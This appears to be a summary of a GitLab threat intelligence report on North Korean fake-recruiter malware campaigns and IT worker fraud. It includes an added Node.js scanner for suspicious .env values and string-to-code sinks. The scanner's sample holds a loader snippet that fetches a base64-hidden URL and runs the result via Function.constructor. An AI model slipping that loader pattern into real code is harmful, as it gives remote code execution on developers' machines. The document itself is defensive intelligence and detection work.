The GitLab Threat Intelligence Team has detailed its efforts to disrupt North Korean (DPRK) cyber campaigns, specifically focusing on "Contagious Interview" malware distribution and fraudulent IT worker schemes. By analyzing internal platform data, GitLab identified that these state-sponsored actors leverage legitimate tools and fake recruitment scenarios to compromise software developers and generate illicit revenue for the regime. The report concludes that while these operations are sophisticated and persistent, proactive monitoring and cross-industry intelligence sharing are essential to mitigating these evolving threats.
### Contagious Interview Mechanics
* Threat actors pose as recruiters to trick software developers into executing malicious JavaScript projects under the guise of technical interviews.
* The primary goal is to deploy malware families such as BeaverTail and Ottercookie, which facilitate credential theft and provide remote control of the victim's device.
* A notable evolution in tradecraft includes the use of "ClickFix," a compiled BeaverTail variant identified in late 2025.
* Malicious repositories often use a specific execution pattern where base64-encoded URLs and secret headers are hidden within `.env` files, masquerading as benign configuration variables.
* To execute the payload, actors use `Function.constructor` to turn strings into executable code, often triggered from custom error handlers that fetch the remote content.
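As an added example (not code from the GitLab report), the following Node.js script implements a heuristic reviewer for the two indicators just listed: `.env` values that are base64-encoded URLs or headers, and source lines that convert strings into code via `Function.constructor`. The `.env` contents, the `example.invalid` URL and the loader snippet it scans are constructed samples; the scanner itself is an assumption of what a defender might run, not GitLab's tooling.

```javascript
// Added example (not code from the GitLab report): heuristic review of a JS project for
// the two indicators above: .env values that are base64-encoded URLs or headers, and
// source that turns strings into code. The samples at the bottom are constructed.
const URL_RE = /^https?:\/\/\S+$/;
const BASE64_RE = /^[A-Za-z0-9+/]{16,}={0,2}$/;
function decodeBase64(value) {
  // Only accept clean base64 that decodes to printable ASCII (URLs, headers).
  if (!BASE64_RE.test(value)) return null;
  const decoded = Buffer.from(value, "base64").toString("utf8");
  return /^[\x20-\x7e]+$/.test(decoded) ? decoded : null;
}
// Parse KEY=VALUE lines and flag values that decode to a URL or to a
// "Header-Name: value" string posing as a benign configuration variable.
function scanEnv(envText) {
  const findings = [];
  for (const raw of envText.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith("#") || !line.includes("=")) continue;
    const eq = line.indexOf("=");
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim().replace(/^["']|["']$/g, "");
    const decoded = decodeBase64(value);
    if (decoded === null) continue;
    if (URL_RE.test(decoded)) findings.push({ key, reason: "base64-encoded URL", decoded });
    else if (/^[\w-]+:\s*\S+$/.test(decoded)) findings.push({ key, reason: "base64-encoded header", decoded });
  }
  return findings;
}
// Flag string-to-code sinks with line numbers so a reviewer can inspect the
// surrounding error handler or fetch call that supplies the string.
function scanSource(jsText) {
  const SINKS = [/Function\.constructor/, /\bnew\s+Function\s*\(/, /\beval\s*\(/];
  const findings = [];
  jsText.split("\n").forEach((line, i) => {
    for (const re of SINKS) {
      const m = line.match(re);
      if (m) findings.push({ line: i + 1, sink: m[0].trim() });
    }
  });
  return findings;
}
// Constructed samples (example.invalid is a reserved name); the loader text is never run.
const SAMPLE_ENV = [
  "API_BASE=" + Buffer.from("https://example.invalid/payload.js").toString("base64"),
  "API_KEY=" + Buffer.from("x-secret-key: abc123").toString("base64"),
].join("\n");
const SAMPLE_SRC = "Promise.reject().catch(async () => {\n" +
  "  const body = await (await fetch(atob(process.env.API_BASE))).text();\n" +
  "  Function.constructor('require', body)(require);\n});";
```

Running `scanEnv(SAMPLE_ENV)` flags both smuggled values, and `scanSource(SAMPLE_SRC)` reports the `Function.constructor` sink on line 3 so the reviewer can see it sits inside a `.catch` handler fed by a fetch.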
### 2025 Campaign Trends and Infrastructure
* GitLab banned 131 unique accounts linked to these campaigns in 2025, with activity peaking in September and averaging 11 bans per month.
* Nearly 90% of malicious accounts were created using Gmail addresses, and actors typically accessed the platform through consumer VPNs or dedicated VPS infrastructure.
* In more than 80% of cases, malware payloads were not stored on GitLab. Instead, actors used concealed loaders to fetch content from legitimate hosting services, most commonly Vercel.
* Recent tactics include the creation of malicious NPM dependencies immediately before use and the exploitation of VS Code tasks to pipe remote content into native shells.
### IT Worker Campaigns and Sanctions Evasion
* Beyond malware distribution, DPRK actors use GitLab to support "IT worker" cells that generate revenue and evade international sanctions.
* One identified pipeline involved the creation of at least 135 synthetic identities, automated to generate professional connections and contact leads at scale.
* Threat actors have been observed adding their own images to stolen U.S. identity documents to bypass employment verification processes.
* Forensic analysis revealed financial records from cell managers detailing revenue proceeds from 2022 through 2025, often earned while operating from locations like Moscow, Russia.
Organizations should remain vigilant against recruitment-themed social engineering and scrutinize unexpected requests to run external code. GitLab recommends that the security community use the provided indicators of compromise to update defensive posture, as these actors continue to refine their ability to hide malicious intent within legitimate development workflows.